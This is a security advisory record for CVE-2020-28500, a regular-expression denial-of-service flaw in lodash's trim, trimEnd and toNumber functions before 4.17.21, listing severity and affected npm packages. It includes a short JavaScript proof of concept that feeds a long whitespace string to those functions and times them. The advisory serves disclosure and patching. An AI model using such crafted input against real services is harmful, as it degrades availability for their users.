GHSA-29mw-wpgm-hmr9

Suggest an improvement
Source
https://github.com/advisories/GHSA-29mw-wpgm-hmr9
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/01/GHSA-29mw-wpgm-hmr9/GHSA-29mw-wpgm-hmr9.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-29mw-wpgm-hmr9
Aliases
  • CVE-2020-28500
  • SNYK-JAVA-ORGFUJIONWEBJARS-1074896
  • SNYK-JAVA-ORGWEBJARS-1074894
  • SNYK-JAVA-ORGWEBJARSBOWER-1074892
  • SNYK-JAVA-ORGWEBJARSBOWERGITHUBLODASH-1074895
  • SNYK-JAVA-ORGWEBJARSNPM-1074893
  • SNYK-JS-LODASH-1018905
Published
2022-01-06T20:30:46Z
Modified
2024-08-01T09:11:58.512292Z
Severity
  • 5.3 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L CVSS Calculator
Summary
Regular Expression Denial of Service (ReDoS) in lodash
Details

All versions of package lodash prior to 4.17.21 are vulnerable to Regular Expression Denial of Service (ReDoS) via the toNumber, trim and trimEnd functions.

Steps to reproduce (provided by reporter Liyuan Chen):

var lo = require('lodash');

function build_blank(n) {
    var ret = "1"
    for (var i = 0; i < n; i++) {
        ret += " "
    }
    return ret + "1";
}
var s = build_blank(50000) var time0 = Date.now();
lo.trim(s) 
var time_cost0 = Date.now() - time0;
console.log("time_cost0: " + time_cost0);
var time1 = Date.now();
lo.toNumber(s) var time_cost1 = Date.now() - time1;
console.log("time_cost1: " + time_cost1);
var time2 = Date.now();
lo.trimEnd(s);
var time_cost2 = Date.now() - time2;
console.log("time_cost2: " + time_cost2);
Database specific
{
    "nvd_published_at": "2021-02-15T11:15:00Z",
    "cwe_ids": [
        "CWE-1333",
        "CWE-400"
    ],
    "severity": "MODERATE",
    "github_reviewed": true,
    "github_reviewed_at": "2021-03-19T22:45:28Z"
}
References

Affected packages

npm / lodash

Package

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
4.17.21

Ecosystem specific

{
    "affected_functions": [
        "(lodash).toNumber",
        "(lodash).trim",
        "(lodash).trimEnd"
    ]
}

npm / lodash-es

Package

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Fixed
4.17.21

Ecosystem specific

{
    "affected_functions": [
        "(lodash-es).toNumber",
        "(lodash-es).trim",
        "(lodash-es).trimEnd"
    ]
}

npm / lodash.trimend

Package

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
4.5.1

Ecosystem specific

{
    "affected_functions": [
        "(lodash.trimend)"
    ]
}

npm / lodash.trim

Package

Affected ranges

Type
SEMVER
Events
Introduced
0Unknown introduced version / All previous versions are affected
Last affected
4.5.1

Ecosystem specific

{
    "affected_functions": [
        "(lodash.trim)"
    ]
}